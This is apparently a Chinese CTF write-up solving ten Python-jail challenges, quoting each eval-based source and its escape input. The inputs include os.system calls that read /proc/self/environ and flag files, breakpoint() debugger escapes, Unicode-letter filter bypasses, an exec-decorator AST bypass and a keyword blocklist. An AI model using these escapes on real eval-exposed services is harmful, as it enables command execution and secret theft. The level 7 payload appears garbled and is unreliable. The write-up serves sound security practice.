第一关
学会看环境变量
__import__("os").system('cat /proc/self/environ');
第二关
给出了源码先查看
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | |___ \
| | | _| \ \ / /| _| | | __) |
| |___| |___ \ V / | |___| |___ / __/
|_____|_____| \_/ |_____|_____| |_____|
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
源码没用捏
__import__("os").system('cat flag')
第三关
WELCOME = '''
_ _______ _______ _ _____
| | | ____\ \ / / ____| | |___ /
| | | _| \ \ / /| _| | | |_ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 13:
print("It's too long to eval")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
eval(input())
open("flag").read()
第四关
显示It's too long to eval
应该是字符串长度限制
WELCOME = '''
_ _______ _______ _ _ _
| | | ____\ \ / / ____| | | || |
| | | _| \ \ / /| _| | | | || |_
| |___| |___ \ V / | |___| |___ |__ _|
|_____|_____| \_/ |_____|_____| |_|
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if len(input_data) > 12:
print("It's too long to eval")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
先利用breakpoint()破坏主要函数
再输入open("flag").read()得到flag
第五关
ban掉了这些函数但是依旧可以和第四关一个做法
WELCOME = '''
_ _______ _______ _ ____
| | | ____\ \ / / ____| | | ___|
| | | _| \ \ / /| _| | | |___ \
| |___| |___ \ V / | |___| |___ ___) |
|_____|_____| \_/ |_____|_____| |____/
'''
black = ["input", "import", "os", "open", "popen", "system", "read", "_", "'", "\""]
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if any([i in input_data for i in black]):
print("Ohhhh, what are you doing???!!!")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
先利用breakpoint()破坏主要函数
再输入open("flag").read()得到flag
第六关
禁用了英语字符但是可以用其他的文字符号来使用来运用breakpoint()
from string import ascii_letters
WELCOME = '''
_ _______ _______ _ __
| | | ____\ \ / / ____| | / /_
| | | _| \ \ / /| _| | | | '_ \
| |___| |___ \ V / | |___| |___ | (_) |
|_____|_____| \_/ |_____|_____| \___/
'''
print(WELCOME)
print("Welcome to the JBNRZ's pyjail")
print("Enter your expression and I will evaluate it for you.")
print("Example: ")
print(" input: 1 + 1")
print(" Result: 2")
input_data = input("> ")
if any([i in ascii_letters for i in input_data]):
print("Ohhhh, what are you doing???!!!")
exit(0)
try:
print("Result: {}".format(eval(input_data)))
except Exception as e:
print(f"Result: {e}")
这里用https://lingojam.com/ItalicTextGenerator 这个网站来转换然后再输入breakpoint()
再open("flag").read()
第七关
没给源码捏
nc连接后是这样的画面
这大概就是个猜函数的
那么我们的思路就是,读文件,然后输出
用os.open打开文件,然后用os.read读文件,当然也可以用__import__('io').open("flag").read()
payload:
import("sys").stdout.write(import("os").read(import("os").open("flag",import("os").O_RDONLY), 0x114).decode())
第八关
无回显的输入
WELCOME = '''
_ _______ _______ _ ___
| | | ____\ \ / / ____| | ( _ )
| | | _| \ \ / /| _| | | / _ \
| |___| |___ \ V / | |___| |___ | (_) |
|_____|_____| \_/ |_____|_____| \___/
'''
print WELCOME
print "Welcome to the python jail"
print "This program will repeat your messages"
input_data = input("> ")
print input_data
第九关
没有源码先分析题目
按下g后ast后不能含有一下内容
但是可以直接绕过检测
@exec
@input
class X: pass
然后再在末尾加上要求的--CBCTF就行
让后就用最ez的方式出flag就行(open不行捏)
最后一关(level 10)
没看题,直接breakpoint()秒了